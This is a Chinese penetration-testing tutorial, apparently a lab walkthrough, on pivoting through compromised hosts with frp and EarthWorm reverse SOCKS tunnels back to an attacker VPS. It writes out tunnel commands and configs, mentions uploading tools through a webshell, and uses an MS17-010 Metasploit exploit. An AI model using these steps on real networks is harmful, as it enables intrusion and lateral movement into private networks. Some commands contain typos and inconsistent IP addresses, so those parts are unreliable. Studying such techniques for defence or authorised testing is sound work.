Socks代理实战(2)

admin 2021年8月27日14:31:45评论62 views字数 2757阅读9分11秒阅读模式

Socks代理实战·2

/04 Socks代理实战-frp

首先你要有个VPS(frps服务器)

准备好穿透工具frp

先这样,后那些,再这样,最后在那样 —— 懂了么,怎么听不懂呢,再说一遍。先这样,后那样,再这样,最后在那样懂了吧。怎么还是不懂。

说细点

一,VPS

准备好frp包

image-20201201164312307

vps上解压,并创建一个配置文件frps_vps.ini,文件名其实随意,主要是配置信息一致。

1
2
3
4
5
6
7
vim frps_vps.ini

[common]
bind_port=7000

:wq
./ftps -c frps_vps.ini #启动frps

image-20201201164541387

二,Target1

当我们拿到一个网站的shell并用yijian连接后上传frpc和配置文件(配置文件自己写也可以):

image-20201201164836849

检查配置信息启动frp客户端:

image-20201201164932708

这时候vps服务器会接收到数据,还要注意,被控制方可以访问到我们的VPS。

配置文件解释:

common:

server_addr为VPS的IP,

server_port为VPS bind_port配置的端口,

socks5:

type传输类型

remote_port传输端口

plugin代理类型

Proxychains

配置信息注意Ip为VPSip,端口为target转交的端口

image-20201201165916231

image-20201201170050657

三,Target2

然后再通过代理拿到target2的webshell,yijian连接

然后老套路上传frpc和配置信息

但是Target2处于内网,访问不到我们的VPS那怎么办呢,只能能Target1作为frps了

上传Target1的frps和配置文件

image-20201201172215175

配置文件信息:

image-20201201172238805

启动服务:

image-20201201172503329

target2的配置信息:

image-20201201174958754

跟VPS到Target1的配置几乎一样,将本机的流量传输给frps服务器192.168.22.128的10089端口

Tips:192.168.1.128也是Target1的一个网卡但是Target2并不能传到所以要为192.168.22.128同网段的

image-20201201175104600

image-20201201175051245

重要配置现在Target2已经挂载代理到Target1了但是,我们攻击机并不能访问,流量并没有通向我们这,所以要修改一下target1的frpc的配置要将192.168.22.129的流量经过自己10089转交到VPS的10090端口配置信息如下:

image-20201202151430083

比一层代理多了一端转发将本机1089端口转发到VPS的10090端口

配置好重新运行即可

修改proxychains的代理端口为10090

image-20201202151825040

然后通过VPS探测33.33主机的信息

image-20201202151601600

Tip:socks代理也可以设置身份验证来达到自己建立的通道不被他人盗用,需要在客户端通道信息下面添加plugin_usename和plugin_password的字段。

frp代理限于环境原因经常意外中断需要重新启动检查时建议使用,ps命令和netsat -anlp来回检查使用。

/05 EW

前置:

image-20201203164812580

一,EW的一层代理

VPS192.168.1.129:

1
./ew -s rcsocks -l 1888 -e 7788

image-20201202203404163

target1:192.168.1.128|192.168.22.128

1
./ew -s rssocks -d 192.168.1.129 -e 7788

image-20201202203817140

image-20201202203840430

proxychains配置:

image-20201202204031370

使用proxychains访问内网target2(192.168.22.129)

image-20201202204118333

二,EW二层代理

注意建立好一层才能访问到Target2哦才能建立代理二层哦,建立好二层一层就可以终止了

VPS192.168.1.129:

1
./ew_for_linux64 -s lcx_listen -l 10088 -e 8888

image-20201203150932754

Target2,192.168.22.129:

1
./ew_for_linux64 -s ssocksd -l 9999

image-20201203151211117

Target1,192.168.1.128||192.168.22.128:

1
./ew_for_linux64 -s lcx_slave -d 192.168.1.129 -e 8888 -f 192.168.22.129 -g 9999

image-20201203151626080

VPS的socks代理成功提示:

image-20201203151913940

proxuchains nmap验证:

image-20201203151945106

使用msf拿到target3的shell通过信息收集知道target3存在ms017_010_psexec

image-20201203160905124

image-20201203160923799

image-20201203160952900

image-20201203161048190

image-20201203161107585

拿到了shell上传ew

四,EW建立三层代理

VPS192.168.1.129:

1
./ew_for_linux64 -s rcsocks -l 10090 -e 6666

image-20201203162838686

Target2,192.168.22.129|192.168.33.128:

1
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777

image-20201203163352223

Target3,192.168.33.33:

1
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777

image-20201203163131439

Target1,192.168.1.128|192.168.22.128:

1
./ew_for_linux64 -d 192.168.1.128 -e 6666 -f 192.168.22.129 -g 7778

image-20201203163308117

由底层到VPS的转发过程:

Target3,192.168.33.33:将流量转发至192.168.33.128:7777

1
./ew_for_linux64 -s rssocks -d 192.168.33.128 -e 7777

Target2,192.168.22.129|192.168.33.128:将本地7777的流量转发至7778

1
./ew_for_linux64 -s lcx_listen -l 7778 -e 7777

Target1,192.168.1.128|192.168.22.128:将Target2(192.168.22.128)7778转义到VPS的6666端口

1
./ew_for_linux64 -d 192.168.1.129 -e 6666 -f 192.168.22.128 -g 7778

VPS192.168.1.129:

1
./ew_for_linux64 -s rcsocks -l 10090 -e 6666

将VPS的6666端口转发至10090用户建立代理VPSIP+10090端口即可访问到三层代理,

只提供重VPS到Target3的流量并不能访问Target1,2哦,但是一般穿透内网都是一层一层打下来所以一定拿到了target1,2的shell和一二层的代理,注意端口别重复使用哦。

建立代理提前搭建流量流通模型更方便理解思考

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: HITCON 2015 lalala(SSRF)

题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php 一个文件上传题,尝试上传个图片,结果: 好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。 但…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月27日14:31:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Socks代理实战(2)http://cn-sec.com/archives/475101.html

发表评论

匿名网友 填写信息